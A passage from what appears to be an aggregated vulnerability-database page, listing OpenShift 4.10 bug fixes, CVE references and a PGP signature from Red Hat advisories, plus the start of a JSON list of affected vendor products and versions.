2040793 - Fix snapshot e2e failures
2040880 - do not block upgrades if we can't connect to vcenter
2041087 - MetalLB: MetalLB CR is not upgraded automatically from 4.9 to 4.10
2041093 - autounattend.xml missing
2041204 - link to templates in virtualization-cluster-overview inventory card is to all templates
2041319 - [IPI on Alibabacloud] installation in region "cn-shanghai" failed, due to "Resource alicloud_vswitch CreateVSwitch Failed...InvalidCidrBlock.Overlapped"
2041326 - Should bump cluster-kube-descheduler-operator to kubernetes version V1.23
2041329 - aws and gcp CredentialsRequest manifests missing ServiceAccountNames list for cloud-network-config-controller
2041361 - [IPI on Alibabacloud] Disable session persistence and removebBandwidth peak of listener
2041441 - Provision volume with size 3000Gi even if sizeRange: '[10-2000]GiB' in storageclass on IBM cloud
2041466 - Kubedescheduler version is missing from the operator logs
2041475 - React components should have a (mostly) unique name in react dev tools to simplify code analyses
2041483 - MetallB: quay.io/openshift/origin-kube-rbac-proxy:4.10 deploy Metallb CR is missing (controller and speaker pods)
2041492 - Spacing between resources in inventory card is too small
2041509 - GCP Cloud provider components should use K8s 1.23 dependencies
2041510 - cluster-baremetal-operator doesn't run baremetal-operator's subscription webhook
2041541 - audit: ManagedFields are dropped using API not annotation
2041546 - ovnkube: set election timer at RAFT cluster creation time
2041554 - use lease for leader election
2041581 - KubeDescheduler operator log shows "Use of insecure cipher detected"
2041583 - etcd and api server cpu mask interferes with a guaranteed workload
2041598 - Including CA bundle in Azure Stack cloud config causes MCO failure
2041605 - Dynamic Plugins: discrepancy in proxy alias documentation/implementation
2041620 - bundle CSV alm-examples does not parse
2041641 - Fix inotify leak and kubelet retaining memory
2041671 - Delete templates leads to 404 page
2041694 - [IPI on Alibabacloud] installation fails when region does not support the cloud_essd disk category
2041734 - ovs hwol: VFs are unbind when switchdev mode is enabled
2041750 - [IPI on Alibabacloud] trying "create install-config" with region "cn-wulanchabu (China (Ulanqab))" (or "ap-southeast-6 (Philippines (Manila))", "cn-guangzhou (China (Guangzhou))") failed due to invalid endpoint
2041763 - The Observe > Alerting pages no longer have their default sort order applied
2041830 - CI: ovn-kubernetes-master-e2e-aws-ovn-windows is broken
2041854 - Communities / Local prefs are applied to all the services regardless of the pool, and only one community is applied
2041882 - cloud-network-config operator can't work normal on GCP workload identity cluster
2041888 - Intermittent incorrect build to run correlation, leading to run status updates applied to wrong build, builds stuck in non-terminal phases
2041926 - [IPI on Alibabacloud] Installer ignores public zone when it does not exist
2041971 - [vsphere] Reconciliation of mutating webhooks didn't happen
2041989 - CredentialsRequest manifests being installed for ibm-cloud-managed profile
2041999 - [PROXY] external dns pod cannot recognize custom proxy CA
2042001 - unexpectedly found multiple load balancers
2042029 - kubedescheduler fails to install completely
2042036 - [IBMCLOUD] "openshift-install explain installconfig.platform.ibmcloud" contains not yet supported custom vpc parameters
2042049 - Seeing warning related to unrecognized feature gate in kubescheduler & KCM logs
2042059 - update discovery burst to reflect lots of CRDs on openshift clusters
2042069 - Revert toolbox to rhcos-toolbox
2042169 - Can not delete egressnetworkpolicy in Foreground propagation
2042181 - MetalLB: User should not be allowed add same bgp advertisement twice in BGP address pool
2042265 - [IBM]"--scale-down-utilization-threshold" doesn't work on IBMCloud
2042274 - Storage API should be used when creating a PVC
2042315 - Baremetal IPI deployment with IPv6 control plane and disabled provisioning network fails as the nodes do not pass introspection
2042366 - Lifecycle hooks should be independently managed
2042370 - [IPI on Alibabacloud] installer panics when the zone does not have an enhanced NAT gateway
2042382 - [e2e][automation] CI takes more then 2 hours to run
2042395 - Add prerequisites for active health checks test
2042438 - Missing rpms in openstack-installer image
2042466 - Selection does not happen when switching from Topology Graph to List View
2042493 - No way to verify if IPs with leading zeros are still valid in the apiserver
2042567 - insufficient info on CodeReady Containers configuration
2042600 - Alone, the io.kubernetes.cri-o.Devices option poses a security risk
2042619 - Overview page of the console is broken for hypershift clusters
2042655 - [IPI on Alibabacloud] cluster becomes unusable if there is only one kube-apiserver pod running
2042711 - [IBMCloud] Machine Deletion Hook cannot work on IBMCloud
2042715 - [AliCloud] Machine Deletion Hook cannot work on AliCloud
2042770 - [IPI on Alibabacloud] with vpcID & vswitchIDs specified, the installer would still try creating NAT gateway unexpectedly
2042829 - Topology performance: HPA was fetched for each Deployment (Pod Ring)
2042851 - Create template from SAP HANA template flow - VM is created instead of a new template
2042906 - Edit machineset with same machine deletion hook name succeed
2042960 - azure-file CI fails with "gid(0) in storageClass and pod fsgroup(1000) are not equal"
2043003 - [IPI on Alibabacloud] 'destroy cluster' of a failed installation (bug2041694) stuck after 'stage=Nat gateways'
2043042 - [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]
2043043 - Cluster Autoscaler should use K8s 1.23 dependencies
2043064 - Topology performance: Unnecessary rerenderings in topology nodes (unchanged mobx props)
2043078 - Favorite system projects not visible in the project selector after toggling "Show default projects".
2043117 - Recommended operators links are erroneously treated as external
2043130 - Update CSI sidecars to the latest release for 4.10
2043234 - Missing validation when creating several BGPPeers with the same peerAddress
2043240 - Sync openshift/descheduler with sigs.k8s.io/descheduler
2043254 - crio does not bind the security profiles directory
2043296 - Ignition fails when reusing existing statically-keyed LUKS volume
2043297 - [4.10] Bootimage bump tracker
2043316 - RHCOS VM fails to boot on Nutanix AOS
2043446 - Rebase aws-efs-utils to the latest upstream version.
2043556 - Add proper ci-operator configuration to ironic and ironic-agent images
2043577 - DPU network operator
2043651 - Fix bug with exp. backoff working correcly when setting nextCheck in vsphere operator
2043675 - Too many machines deleted by cluster autoscaler when scaling down
2043683 - Revert bug 2039344 Ignoring IPv6 addresses against etcd cert validation
2043709 - Logging flags no longer being bound to command line
2043721 - Installer bootstrap hosts using outdated kubelet containing bugs
2043731 - [IBMCloud] terraform outputs missing for ibmcloud bootstrap and worker ips for must-gather
2043759 - Bump cluster-ingress-operator to k8s.io/api 1.23
2043780 - Bump router to k8s.io/api 1.23
2043787 - Bump cluster-dns-operator to k8s.io/api 1.23
2043801 - Bump CoreDNS to k8s.io/api 1.23
2043802 - EgressIP stopped working after single egressIP for a netnamespace is switched to the other node of HA pair after the first egress node is shutdown
2043961 - [OVN-K] If pod creation fails, retry doesn't work as expected.
2044201 - Templates golden image parameters names should be supported
2044244 - Builds are failing after upgrading the cluster with builder image [jboss-webserver-5/jws56-openjdk8-openshift-rhel8]
2044248 - [IBMCloud][vpc.block.csi.ibm.io]Cluster common user use the storageclass without parameter “csi.storage.k8s.io/fstype” create pvc,pod successfully but write data to the pod's volume failed of "Permission denied"
2044303 - [ovn][cloud-network-config-controller] cloudprivateipconfigs ips were left after deleting egressip objects
2044347 - Bump to kubernetes 1.23.3
2044481 - collect sharedresource cluster scoped instances with must-gather
2044496 - Unable to create hardware events subscription - failed to add finalizers
2044628 - CVE-2022-21673 grafana: Forward OAuth Identity Token can allow users to access some data sources
2044680 - Additional libovsdb performance and resource consumption fixes
2044704 - Observe > Alerting pages should not show runbook links in 4.10
2044717 - [e2e] improve tests for upstream test environment
2044724 - Remove namespace column on VM list page when a project is selected
2044745 - Upgrading cluster from 4.9 to 4.10 on Azure (ARO) causes the cloud-network-config-controller pod to CrashLoopBackOff
2044808 - machine-config-daemon-pull.service: use cp instead of cat when extracting MCD in OKD
2045024 - CustomNoUpgrade alerts should be ignored
2045112 - vsphere-problem-detector has missing rbac rules for leases
2045199 - SnapShot with Disk Hot-plug hangs
2045561 - Cluster Autoscaler should use the same default Group value as Cluster API
2045591 - Reconciliation of aws pod identity mutating webhook did not happen
2045849 - Add Sprint 212 translations
2045866 - MCO Operator pod spam "Error creating event" warning messages in 4.10
2045878 - Sync upstream 1.16.0 downstream; includes hybrid helm plugin
2045916 - [IBMCloud] Default machine profile in installer is unreliable
2045927 - [FJ OCP4.10 Bug]: Podman failed to pull the IPA image due to the loss of proxy environment
2046025 - [IPI on Alibabacloud] pre-configured alicloud DNS private zone is deleted after destroying cluster, please clarify
2046137 - oc output for unknown commands is not human readable
2046296 - When creating multiple consecutive egressIPs on GCP not all of them get assigned to the instance
2046297 - Bump DB reconnect timeout
2046517 - In Notification drawer, the "Recommendations" header shows when there isn't any recommendations
2046597 - Observe > Targets page may show the wrong service monitor is multiple monitors have the same namespace & label selectors
2046626 - Allow setting custom metrics for Ansible-based Operators
2046683 - [AliCloud]"--scale-down-utilization-threshold" doesn't work on AliCloud
2047025 - Installation fails because of Alibaba CSI driver operator is degraded
2047190 - Bump Alibaba CSI driver for 4.10
2047238 - When using communities and localpreferences together, only localpreference gets applied
2047255 - alibaba: resourceGroupID not found
2047258 - [aws-usgov] fatal error occurred if AMI is not provided for AWS GovCloud regions
2047317 - Update HELM OWNERS files under Dev Console
2047455 - [IBM Cloud] Update custom image os type
2047496 - Add image digest feature
2047779 - do not degrade cluster if storagepolicy creation fails
2047927 - 'oc get project' caused 'Observed a panic: cannot deep copy core.NamespacePhase' when AllRequestBodies is used
2047929 - use lease for leader election
2047975 - [sig-network][Feature:Router] The HAProxy router should override the route host for overridden domains with a custom value [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2048046 - New route annotation to show another URL or hide topology URL decorator doesn't work for Knative Services
2048048 - Application tab in User Preferences dropdown menus are too wide.
2048050 - Topology list view items are not highlighted on keyboard navigation
2048117 - [IBM]Shouldn't change status.storage.bucket and status.storage.resourceKeyCRN when update sepc.stroage,ibmcos with invalid value
2048413 - Bond CNI: Failed to attach Bond NAD to pod
2048443 - Image registry operator panics when finalizes config deletion
2048478 - [alicloud] CCM deploys alibaba-cloud-controller-manager from quay.io/openshift/origin-*
2048484 - SNO: cluster-policy-controller failed to start due to missing serving-cert/tls.crt
2048598 - Web terminal view is broken
2048836 - ovs-configure mis-detecting the ipv6 status on IPv4 only cluster causing Deployment failure
2048891 - Topology page is crashed
2049003 - 4.10: [IBMCloud] ibm-vpc-block-csi-node does not specify an update strategy, only resource requests, or priority class
2049043 - Cannot create VM from template
2049156 - 'oc get project' caused 'Observed a panic: cannot deep copy core.NamespacePhase' when AllRequestBodies is used
2049886 - Placeholder bug for OCP 4.10.0 metadata release
2049890 - Warning annotation for pods with cpu requests or limits on single-node OpenShift cluster without workload partitioning
2050189 - [aws-efs-csi-driver] Merge upstream changes since v1.3.2
2050190 - [aws-ebs-csi-driver] Merge upstream changes since v1.2.0
2050227 - Installation on PSI fails with: 'openstack platform does not have the required standard-attr-tag network extension'
2050247 - Failing test in periodics: [sig-network] Services should respect internalTrafficPolicy=Local Pod and Node, to Pod (hostNetwork: true) [Feature:ServiceInternalTrafficPolicy] [Skipped:Network/OVNKubernetes] [Suite:openshift/conformance/parallel] [Suite:k8s]
2050250 - Install fails to bootstrap, complaining about DefragControllerDegraded and sad members
2050310 - ContainerCreateError when trying to launch large (>500) numbers of pods across nodes
2050370 - alert data for burn budget needs to be updated to prevent regression
2050393 - ZTP missing support for local image registry and custom machine config
2050557 - Can not push images to image-registry when enabling KMS encryption in AlibabaCloud
2050737 - Remove metrics and events for master port offsets
2050801 - Vsphere upi tries to access vsphere during manifests generation phase
2050883 - Logger object in LSO does not log source location accurately
2051692 - co/image-registry is degrade because ImagePrunerDegraded: Job has reached the specified backoff limit
2052062 - Whereabouts should implement client-go 1.22+
2052125 - [4.10] Crio appears to be coredumping in some scenarios
2052210 - [aws-c2s] kube-apiserver crashloops due to missing cloud config
2052339 - Failing webhooks will block an upgrade to 4.10 mid-way through the upgrade.
2052458 - [IBM Cloud] ibm-vpc-block-csi-controller does not specify an update strategy, priority class, or only resource requests
2052598 - kube-scheduler should use configmap lease
2052599 - kube-controller-manger should use configmap lease
2052600 - Failed to scaleup RHEL machine against OVN cluster due to jq tool is required by configure-ovs.sh
2052609 - [vSphere CSI driver Operator] RWX volumes counts metrics vsphere_rwx_volumes_total not valid
2052611 - MetalLB: BGPPeer object does not have ability to set ebgpMultiHop
2052612 - MetalLB: Webhook Validation: Two BGPPeers instances can have different router ID set.
2052644 - Infinite OAuth redirect loop post-upgrade to 4.10.0-rc.1
2052666 - [4.10.z] change gitmodules to rhcos-4.10 branch
2052756 - [4.10] PVs are not being cleaned up after PVC deletion
2053175 - oc adm catalog mirror throws 'missing signature key' error when using file://local/index
2053218 - ImagePull fails with error "unable to pull manifest from example.com/busy.box:v5 invalid reference format"
2053252 - Sidepanel for Connectors/workloads in topology shows invalid tabs
2053268 - inability to detect static lifecycle failure
2053314 - requestheader IDP test doesn't wait for cleanup, causing high failure rates
2053323 - OpenShift-Ansible BYOH Unit Tests are Broken
2053339 - Remove dev preview badge from IBM FlashSystem deployment windows
2053751 - ztp-site-generate container is missing convenience entrypoint
2053945 - [4.10] Failed to apply sriov policy on intel nics
2054109 - Missing "app" label
2054154 - RoleBinding in project without subject is causing "Project access" page to fail
2054244 - Latest pipeline run should be listed on the top of the pipeline run list
2054288 - console-master-e2e-gcp-console is broken
2054562 - DPU network operator 4.10 branch need to sync with master
2054897 - Unable to deploy hw-event-proxy operator
2055193 - e2e-metal-ipi-serial-ovn-ipv6 is failing frequently
2055358 - Summary Interval Hardcoded in PTP Operator if Set in the Global Body Instead of Command Line
2055371 - Remove Check which enforces summary_interval must match logSyncInterval
2055689 - [ibm]Operator storage PROGRESSING and DEGRADED is true during fresh install for ocp4.11
2055894 - CCO mint mode will not work for Azure after sunsetting of Active Directory Graph API
2056441 - AWS EFS CSI driver should use the trusted CA bundle when cluster proxy is configured
2056479 - ovirt-csi-driver-node pods are crashing intermittently
2056572 - reconcilePrecaching error: cannot list resource "clusterserviceversions" in API group "operators.coreos.com" at the cluster scope"
2056629 - [4.10] EFS CSI driver can't unmount volumes with "wait: no child processes"
2056878 - (dummy bug) ovn-kubernetes ExternalTrafficPolicy still SNATs
2056928 - Ingresscontroller LB scope change behaviour differs for different values of aws-load-balancer-internal annotation
2056948 - post 1.23 rebase: regression in service-load balancer reliability
2057438 - Service Level Agreement (SLA) always show 'Unknown'
2057721 - Fix Proxy support in RHACM 2.4.2
2057724 - Image creation fails when NMstateConfig CR is empty
2058641 - [4.10] Pod density test causing problems when using kube-burner
2059761 - 4.9.23-s390x-machine-os-content manifest invalid when mirroring content for disconnected install
2060610 - Broken access to public images: Unable to connect to the server: no basic auth credentials
2060956 - service domain can't be resolved when networkpolicy is used in OCP 4.10-rc
- References:
https://access.redhat.com/security/cve/CVE-2014-3577 https://access.redhat.com/security/cve/CVE-2016-10228 https://access.redhat.com/security/cve/CVE-2017-14502 https://access.redhat.com/security/cve/CVE-2018-20843 https://access.redhat.com/security/cve/CVE-2018-1000858 https://access.redhat.com/security/cve/CVE-2019-8625 https://access.redhat.com/security/cve/CVE-2019-8710 https://access.redhat.com/security/cve/CVE-2019-8720 https://access.redhat.com/security/cve/CVE-2019-8743 https://access.redhat.com/security/cve/CVE-2019-8764 https://access.redhat.com/security/cve/CVE-2019-8766 https://access.redhat.com/security/cve/CVE-2019-8769 https://access.redhat.com/security/cve/CVE-2019-8771 https://access.redhat.com/security/cve/CVE-2019-8782 https://access.redhat.com/security/cve/CVE-2019-8783 https://access.redhat.com/security/cve/CVE-2019-8808 https://access.redhat.com/security/cve/CVE-2019-8811 https://access.redhat.com/security/cve/CVE-2019-8812 https://access.redhat.com/security/cve/CVE-2019-8813 https://access.redhat.com/security/cve/CVE-2019-8814 https://access.redhat.com/security/cve/CVE-2019-8815 https://access.redhat.com/security/cve/CVE-2019-8816 https://access.redhat.com/security/cve/CVE-2019-8819 https://access.redhat.com/security/cve/CVE-2019-8820 https://access.redhat.com/security/cve/CVE-2019-8823 https://access.redhat.com/security/cve/CVE-2019-8835 https://access.redhat.com/security/cve/CVE-2019-8844 https://access.redhat.com/security/cve/CVE-2019-8846 https://access.redhat.com/security/cve/CVE-2019-9169 https://access.redhat.com/security/cve/CVE-2019-13050 https://access.redhat.com/security/cve/CVE-2019-13627 https://access.redhat.com/security/cve/CVE-2019-14889 https://access.redhat.com/security/cve/CVE-2019-15903 https://access.redhat.com/security/cve/CVE-2019-19906 https://access.redhat.com/security/cve/CVE-2019-20454 https://access.redhat.com/security/cve/CVE-2019-20807 https://access.redhat.com/security/cve/CVE-2019-25013 https://access.redhat.com/security/cve/CVE-2020-1730 https://access.redhat.com/security/cve/CVE-2020-3862 https://access.redhat.com/security/cve/CVE-2020-3864 https://access.redhat.com/security/cve/CVE-2020-3865 https://access.redhat.com/security/cve/CVE-2020-3867 https://access.redhat.com/security/cve/CVE-2020-3868 https://access.redhat.com/security/cve/CVE-2020-3885 https://access.redhat.com/security/cve/CVE-2020-3894 https://access.redhat.com/security/cve/CVE-2020-3895 https://access.redhat.com/security/cve/CVE-2020-3897 https://access.redhat.com/security/cve/CVE-2020-3899 https://access.redhat.com/security/cve/CVE-2020-3900 https://access.redhat.com/security/cve/CVE-2020-3901 https://access.redhat.com/security/cve/CVE-2020-3902 https://access.redhat.com/security/cve/CVE-2020-8927 https://access.redhat.com/security/cve/CVE-2020-9802 https://access.redhat.com/security/cve/CVE-2020-9803 https://access.redhat.com/security/cve/CVE-2020-9805 https://access.redhat.com/security/cve/CVE-2020-9806 https://access.redhat.com/security/cve/CVE-2020-9807 https://access.redhat.com/security/cve/CVE-2020-9843 https://access.redhat.com/security/cve/CVE-2020-9850 https://access.redhat.com/security/cve/CVE-2020-9862 https://access.redhat.com/security/cve/CVE-2020-9893 https://access.redhat.com/security/cve/CVE-2020-9894 https://access.redhat.com/security/cve/CVE-2020-9895 https://access.redhat.com/security/cve/CVE-2020-9915 https://access.redhat.com/security/cve/CVE-2020-9925 https://access.redhat.com/security/cve/CVE-2020-9952 https://access.redhat.com/security/cve/CVE-2020-10018 https://access.redhat.com/security/cve/CVE-2020-11793 https://access.redhat.com/security/cve/CVE-2020-13434 https://access.redhat.com/security/cve/CVE-2020-14391 https://access.redhat.com/security/cve/CVE-2020-15358 https://access.redhat.com/security/cve/CVE-2020-15503 https://access.redhat.com/security/cve/CVE-2020-25660 https://access.redhat.com/security/cve/CVE-2020-25677 https://access.redhat.com/security/cve/CVE-2020-27618 https://access.redhat.com/security/cve/CVE-2020-27781 https://access.redhat.com/security/cve/CVE-2020-29361 https://access.redhat.com/security/cve/CVE-2020-29362 https://access.redhat.com/security/cve/CVE-2020-29363 https://access.redhat.com/security/cve/CVE-2021-3121 https://access.redhat.com/security/cve/CVE-2021-3326 https://access.redhat.com/security/cve/CVE-2021-3449 https://access.redhat.com/security/cve/CVE-2021-3450 https://access.redhat.com/security/cve/CVE-2021-3516 https://access.redhat.com/security/cve/CVE-2021-3517 https://access.redhat.com/security/cve/CVE-2021-3518 https://access.redhat.com/security/cve/CVE-2021-3520 https://access.redhat.com/security/cve/CVE-2021-3521 https://access.redhat.com/security/cve/CVE-2021-3537 https://access.redhat.com/security/cve/CVE-2021-3541 https://access.redhat.com/security/cve/CVE-2021-3733 https://access.redhat.com/security/cve/CVE-2021-3749 https://access.redhat.com/security/cve/CVE-2021-20305 https://access.redhat.com/security/cve/CVE-2021-21684 https://access.redhat.com/security/cve/CVE-2021-22946 https://access.redhat.com/security/cve/CVE-2021-22947 https://access.redhat.com/security/cve/CVE-2021-25215 https://access.redhat.com/security/cve/CVE-2021-27218 https://access.redhat.com/security/cve/CVE-2021-30666 https://access.redhat.com/security/cve/CVE-2021-30761 https://access.redhat.com/security/cve/CVE-2021-30762 https://access.redhat.com/security/cve/CVE-2021-33928 https://access.redhat.com/security/cve/CVE-2021-33929 https://access.redhat.com/security/cve/CVE-2021-33930 https://access.redhat.com/security/cve/CVE-2021-33938 https://access.redhat.com/security/cve/CVE-2021-36222 https://access.redhat.com/security/cve/CVE-2021-37750 https://access.redhat.com/security/cve/CVE-2021-39226 https://access.redhat.com/security/cve/CVE-2021-41190 https://access.redhat.com/security/cve/CVE-2021-43813 https://access.redhat.com/security/cve/CVE-2021-44716 https://access.redhat.com/security/cve/CVE-2021-44717 https://access.redhat.com/security/cve/CVE-2022-0532 https://access.redhat.com/security/cve/CVE-2022-21673 https://access.redhat.com/security/cve/CVE-2022-24407 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYipqONzjgjWX9erEAQjQcBAAgWTjA6Q2NgqfVf63ZpJF1jPurZLPqxDL 0in/5+/wqWaiQ6yk7wM3YBZgviyKnAMCVdrLsaR7R77BvfJcTE3W/fzogxpp6Rne eGT1PTgQRecrSIn+WG4gGSteavTULWOIoPvUiNpiy3Y7fFgjFdah+Nyx3Xd+xehM CEswylOd6Hr03KZ1tS3XL3kGL2botha48Yls7FzDFbNcy6TBAuycmQZifKu8mHaF aDAupVJinDnnVgACeS6CnZTAD+Vrx5W7NIisteXv4x5Hy+jBIUHr8Yge3oxYoFnC Y/XmuOw2KilLZuqFe+KHig45qT+FmNU8E1egcGpNWvmS8hGZfiG1jEQAqDPbZHxp sQAQZLQyz3TvXa29vp4QcsUuMxndIOi+QaK75JmqE06MqMIlFDYpr6eQOIgIZvFO RDZU/qvBjh56ypInoqInBf8KOQMy6eO+r6nFbMGcAfucXmz0EVcSP1oFHAoA1nWN rs1Qz/SO4CvdPERxcr1MLuBLggZ6iqGmHKk5IN0SwcndBHaVJ3j/LBv9m7wBYVry bSvojBDYx5ricbTwB5sGzu7oH5yVl813FA9cjkFpEhBiMtTfI+DKC8ssoRYNHd5Z 7gLW6KWPUIDuCIiiioPZAJMyvJ0IMrNDoQ0lhqPeV7PFdlRhT95M/DagUZOpPVuT b5PUYUBIZLc= =GUDA -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Bugs fixed (https://bugzilla.redhat.com/):
1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve 1918761 - CVE-2021-3115 golang: cmd/go: packages using cgo can cause arbitrary code execution at build time 1935897 - Release of OpenShift Serverless Serving 1.14.0 1935898 - Release of OpenShift Serverless Eventing 1.14.0
- This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.
This release adds the new Apache HTTP Server 2.4.37 Service Pack 7 packages that are part of the JBoss Core Services offering. Solution:
Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
The References section of this erratum contains a download link for the update. You must be logged in to download the update
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "storagegrid",
"scope": "eq",
"trust": 2.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "graalvm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.3.1.2"
},
{
"_id": null,
"model": "mysql workbench",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.23"
},
{
"_id": null,
"model": "node.js",
"scope": "lt",
"trust": 1.0,
"vendor": "nodejs",
"version": "15.14.0"
},
{
"_id": null,
"model": "cloud volumes ontap mediator",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "commerce guided search",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.3.2"
},
{
"_id": null,
"model": "nessus network monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "tenable",
"version": "5.12.1"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.59"
},
{
"_id": null,
"model": "web gateway cloud service",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "9.2.10"
},
{
"_id": null,
"model": "node.js",
"scope": "gte",
"trust": 1.0,
"vendor": "nodejs",
"version": "10.0.0"
},
{
"_id": null,
"model": "graalvm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.0.2"
},
{
"_id": null,
"model": "jd edwards world security",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "a9.4"
},
{
"_id": null,
"model": "nessus network monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "tenable",
"version": "5.11.0"
},
{
"_id": null,
"model": "secure backup",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1.0.1.0"
},
{
"_id": null,
"model": "mysql connectors",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.23"
},
{
"_id": null,
"model": "nessus network monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "tenable",
"version": "5.13.0"
},
{
"_id": null,
"model": "web gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "10.1.1"
},
{
"_id": null,
"model": "secure global desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.6"
},
{
"_id": null,
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.7.33"
},
{
"_id": null,
"model": "sonicos",
"scope": "lte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "7.0.1-r1456"
},
{
"_id": null,
"model": "sma100",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "10.2.1.0-17sv"
},
{
"_id": null,
"model": "santricity smi-s provider",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.6.0"
},
{
"_id": null,
"model": "nessus network monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "tenable",
"version": "5.11.1"
},
{
"_id": null,
"model": "node.js",
"scope": "lt",
"trust": 1.0,
"vendor": "nodejs",
"version": "14.16.1"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "windriver",
"version": "17.0"
},
{
"_id": null,
"model": "node.js",
"scope": "gte",
"trust": 1.0,
"vendor": "nodejs",
"version": "14.0.0"
},
{
"_id": null,
"model": "web gateway cloud service",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "8.2.19"
},
{
"_id": null,
"model": "oncommand workflow automation",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "web gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "9.2.10"
},
{
"_id": null,
"model": "mysql server",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.15"
},
{
"_id": null,
"model": "capture client",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "3.6.24"
},
{
"_id": null,
"model": "openssl",
"scope": "gte",
"trust": 1.0,
"vendor": "openssl",
"version": "1.1.1h"
},
{
"_id": null,
"model": "nessus network monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "tenable",
"version": "5.12.0"
},
{
"_id": null,
"model": "node.js",
"scope": "lt",
"trust": 1.0,
"vendor": "nodejs",
"version": "10.24.1"
},
{
"_id": null,
"model": "freebsd",
"scope": "eq",
"trust": 1.0,
"vendor": "freebsd",
"version": "12.2"
},
{
"_id": null,
"model": "mysql enterprise monitor",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.23"
},
{
"_id": null,
"model": "nessus",
"scope": "lte",
"trust": 1.0,
"vendor": "tenable",
"version": "8.13.1"
},
{
"_id": null,
"model": "enterprise manager for storage management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.0.0"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.57"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.1.0.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "windriver",
"version": null
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "node.js",
"scope": "lt",
"trust": 1.0,
"vendor": "nodejs",
"version": "12.22.1"
},
{
"_id": null,
"model": "node.js",
"scope": "gte",
"trust": 1.0,
"vendor": "nodejs",
"version": "12.0.0"
},
{
"_id": null,
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.23"
},
{
"_id": null,
"model": "ontap select deploy administration utility",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"_id": null,
"model": "nessus agent",
"scope": "lte",
"trust": 1.0,
"vendor": "tenable",
"version": "8.2.3"
},
{
"_id": null,
"model": "nessus agent",
"scope": "gte",
"trust": 1.0,
"vendor": "tenable",
"version": "8.2.1"
},
{
"_id": null,
"model": "graalvm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.3.5"
},
{
"_id": null,
"model": "web gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "8.2.19"
},
{
"_id": null,
"model": "node.js",
"scope": "gte",
"trust": 1.0,
"vendor": "nodejs",
"version": "15.0.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "windriver",
"version": "18.0"
},
{
"_id": null,
"model": "web gateway cloud service",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "10.1.1"
},
{
"_id": null,
"model": "email security",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "10.0.11"
},
{
"_id": null,
"model": "openssl",
"scope": "lt",
"trust": 1.0,
"vendor": "openssl",
"version": "1.1.1k"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "windriver",
